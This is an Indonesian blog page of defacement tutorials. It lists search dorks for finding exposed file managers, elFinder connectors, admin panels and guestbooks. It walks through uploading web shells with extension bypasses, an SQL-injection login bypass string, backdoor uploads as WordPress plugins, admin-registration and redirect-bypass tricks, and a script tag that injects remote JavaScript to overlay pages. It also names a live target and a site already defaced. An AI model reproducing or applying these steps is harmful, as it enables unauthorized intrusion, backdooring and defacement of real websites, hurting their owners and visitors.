Halaman

    Social Items

Assalamualaikum W.r W.b
Hallo semuanya
Kali ini saya akan memberikan tutorial
Deface metode Responsive File Manager

langsung gas keun sajaa

Bahan
1.Dork:inurl:/filemanager/dialog.php
             inurl:/assets/filemanager
2.exploit:/dialog.php
3.sabar

-dorking dengan dork di atas jika sudah menemukan web nya.

-lalu masukan exploit nya /dialog.php

-nah sudah terbuka filemanager nya tinggal klik Upload.
-lalu tinggal kalian upload shell atau script deface kalian oh iya....
 *untuk upload shell biasanya extensi nya di bypass menjadi
   -shell.php.fla
   -shell.php.aacdb
-tinggal akses file deface / shell kalian caranya
-klik kanan pada bagian file kalian terus pilih Show URL
-nah muncul deh aksesnya tinggal copy lalu buka deh.
 -yap sudah berhasil.

Yaps cukup sekian tutorial kali ini
see you on the next tutorial and peaceeeee :p

Cara deface metode Responsive File Manager

Assalamualaikum W.r W.b
hallo semuanya kali ini saya akan memberikan  tutorial
Bypass SQL Login

*rata rata sih metode ini digunakan jika kita mendeface menggunakan metode
 SQL injection,admin login sudah ketemu tapi si password kagak bisa di
 hash,nah kan ngeselin yodah langsung ae ya

- Dork : inurl:/admin/login.php intext:administrator
              inurl:/administrator/login.php
              inurl:/admin.php intext:login admin
- Bypass nya : [ ' or 1=1 limit 1 -- -+ ] Langsung saja yupz...

- jika sudah di halaman admin login langsung kita masukin bypass nya
- dan yap berhasil ter bypass
 - jika sudah masuk begini kan tinggal edit/upload shell
*kaga semua site bisa di bypass ya yakali bisa di bypass se enak jidat :p

ok mungkin cukup segini mudah kan??...
yups lah see you on the next tutorial 
and peaceeee :p 

Cara deface metode Bypass SQL Login

Assalamualaikum W.r W.b
Hallo semuanya balik lagi dengan saya
kali ini saya akan memberikan tutorial meng upload shell di CMS Wordpress

cekidot langsung saja

- pastikan kalian sudah di dashboard nya lalu pilih menu plugins.
- lalu setelah itu klik tombol Add New.
- setelah klik Add New lalu kalian klik tombol Upload Plugins.
- pilih shell backdoor yang ingin kalian upload, lalu klik install now.
- jika berhasil terupload akan muncul seperti ini
- tingal kita akses shell nya yaitu dir shell nya di.
   *site.com/wp-content/uploads/tahun/bulan/namashell.php
    kalo kagak ngarti kek gini nih
    site.com/wp-content/uploads/2018/07/namashell.php
  *bulan nya sesuain yap

oke sekian tutorial kali ini.
see you on the next tutorial.
and peaceee :p



Cara Upload Shell Di CMS Wordpres

Assalamualaikum W.r W.b
hallo semuanya back again with me
kali ini saya akan meng share deface metode elfinder

BAHAN
1.internet lah brother yakali kaga pake internet :p
2.dork:inurl:/elfinder/
            inurl:/assets/elfinder/
   *kembangkan lagi yogs
3.exploit : /php/connector.php
4.auto xploiter kalian bisa meng upload di hosting atau web kalian
   *ini source code nya : https://pastebin.com/raw/wcpevk2w

ya langsung saja...
- dorking terlebih dahulu pake dork diatas
- disini saya ada live target http://www.ican-system.fr/adminIcan/elfinder/
- lalu masukan exploit nya jadi seperti ini
     *http://www.ican-system.fr/adminIcan/elfinder/php/connector.php
- jika menemukan seperti ini.
- itu tandanya site vuln tinggal kita masukan ke auto xploiter nya.

 - lalu klik hajar jika berhasil hasil nya akan seperti ini.
- tinggal kita akses *oh ya akses nya site.com/path/elfinder/files/k.php

- yaps uploader nya sudah ke upload, tinggal kalian upload shell kalian masing masing.

ok cukup sekian tutorial kali ini.
see you on the next tutorial brother
peaceee :p

Deface Metode Elfinder

Assalamualaikum W.r W.b
hallo semuanya berjumpa lagi dengan saya
yaps kali ini saya akan mengshare tuturial deface metode Register Admin

ok langsung saja disimak :p

BAHAN
1.internet dund yakali kaga pake internet
2.Dork:intitle:register:: intext:handcrafted by
            intitle:Login :: intext:Handcrafted by
            inurl:/admin/register intitle:Login :: intext:Handcrafted by
            inurl:/admin/ intitle:Login :: intext:Handcrafted by

- Dorking terlebih dahulu dengan dork diatas
- Jika sudah menemukan halaman register nya seperti ini
- Di isi asal saja semuanya
- Nah jika sudah msuk halaman admin nya
- Kita tambahkan di belakang url /admin/ menjadi /admin/elfinder
- Bisa dibilang seperti ini
- Nah kalian tinggal upload deh shell ataupun script deface kalian

yaps mungkin cukup sekian tutorial kali ini
sampai jumpa di next tutorial and peaceee:p
SUMBER TUTORIAL:https://www.panel-pekok.ga/2017/12/deface-register-admin_29.html


Deface metode register admin



Assalamualaikum W.r W.b
hallo semuanya bertemu lagi dengan saya
kali ini saya akan memberikan tutorial deface metode
Bypass Admin Login Page with NoRedirect
BAHAN
1.internet lah boy yakali kaga pake internet.
2.Dork:inurl:/admin/login.php
             inurl:/administrator/
             inurl:/admin.php
*kembangkan lagi ya :p
3.Download and install NoRedirect Add-ons in firefox disini : Add-ons
*ini di mozilla ya kalo google kaga tau gw :p

yups langsung saja :p

- dorking terlebih dahulu memakai dork diatas dan.
- jika sudah menemukan halaman adminnya.
- langsung saja kita buka no redirect nya.
- isi bagian nya seperti ini.
- lalu setelah itu tinggal kita ubah url nya yg tadinya.
         */login.php menjadi index.php
- nah disini kebetulan target saya dashboard admin nya itu /admin/index.php
          *ga semua dashboard admin /index.php bisa juga yang lain misalnya
                -/dashboard.php
                -/home.php
            *dan masih banyak lagi.
- dan yap kita sudah masuk di halaman admin tanpa harus login :p
- sekarang terserah kalian mau di apain deh mau upload shell atau edit berita atau apalah.
NB:kaga semuanya admin login page bisa diginiin ya, ya kali bisa diginiin semua :p

okelah mungkin cukup sekian tutorial saya kali ini.
sekian terima kasih..
see you on the next tutorial and peaceeee:p

Deface Bypass Admin Login Page with NoRedirect

Assalamualaikum W.r W.b
hallo semuanya bertemu lagi dengan saya.
kali ini saya akan mengshare deface dengan metode add bukutamu + jso.

yups langsung saja disimak...

BAHAN
1.Dork:inurl:bukutamu.html
            inurl:bukutamu.php
 *kembangkan lagi ya muehehehe :p
2.Script Jso, jika tidak punya bisa lihat disini > Script Jso

- dorking terlebih dahulu dengan dork di atas.
- jika sudah menemukan web nya kita isi data nya seperti ini.


- jika sudah semua klik SEND MESSAGE.
- lalu akan otomatis tampilan page menjadi script deface kalian.
   *contoh web yang sudah saya jso
       http://mafikibicenter.com/bukutamu.html#sthash.FKBIW77B.dpbs
- yaps mungkin cukup sekian tutorial kali ini.

see you on the next tutorial.....
and peaceeee :p

Deface metode add bukutamu dan js overlay

Assalamualaikum W.r W.b
bertemu lagi dengan saya
kali ini saya akan share metode deface js overlay
yups langsung saja....

saya asumsikan kamu sudah punya web target ya dan sudah masuk di dashboard admin dan mungkin cara ini berguna yang sudah mentok gak bisa up shell backdoor, upload foto. cara yang digunakan yaitu menutup halaman asli website dengan script yang telah dibuat sebelumnya, sebenarnya halaman asli itu tetap ada cuman ketutup sama script deface yang telah kita buat.
so langsung saja ke tutorial yang ada dibawah
Script JS Overlay
  •  <p><script type="text/javascript" src="https://pastebin.com/raw/ipjnqYp4"></script></p>
next... cara untuk mengeditnya silahkan kalian buka "https://pastebin.com/raw/ipjnqYp4" hapus tanda kutipnya ya (""), next silahkan lihat gambar yang di bawah untuk mengeditnya 

NB: warna hitam silahkan di edit sesuai keinginannya sendiri
setelah semuanya sudah di edit, selanjutnya masuk ke web target kemudian tambah berita/add article dan copy script yang di atas
  • <p><script type="text/javascript" src="https://pastebin.com/raw/ipjnqYp4"></script></p>
kemudian save dan lihat websitenya sudah tertutupi dengan SC JS Overlay yang telah di buat

Deface Metode Js Overlay


Assalamualaikum W.r W.b
Hallo semuanya kali ini saya akan memberikan tutorial cara scan dir dengan dirbuster

yups langsung saja ke tutorial nya

1.kalian harus menginstall java dulu, bisa kalian kalian download disini  Java .
2.ikuti proses installisasi javanya.
2.jika java sudah terinstall, lalu kalian download dirbuster yang bisa kalian download disini Dirbuster.
3.jika dirbuster sudah ter download, ikuti perintah untuk installisasi dirbuster nya.
4.jika proses installisasi sudah selesai sekarang kita tinggal buka dirbuster nya.
5.untuk menjalankan nya kalian masukan seperti ini.
              *saya biasanya memakai list yang medium.
6.dan proses scan pun dimulai
*oh ya ini juga bisa membantu kalian untuk mencari admin login :p

Oke mungkin cukup sekian tutorial kali ini
see you on the next tutorial
peaceeee :p

Cara scan dir menggunakan Dirbuster

Subscribe Our Newsletter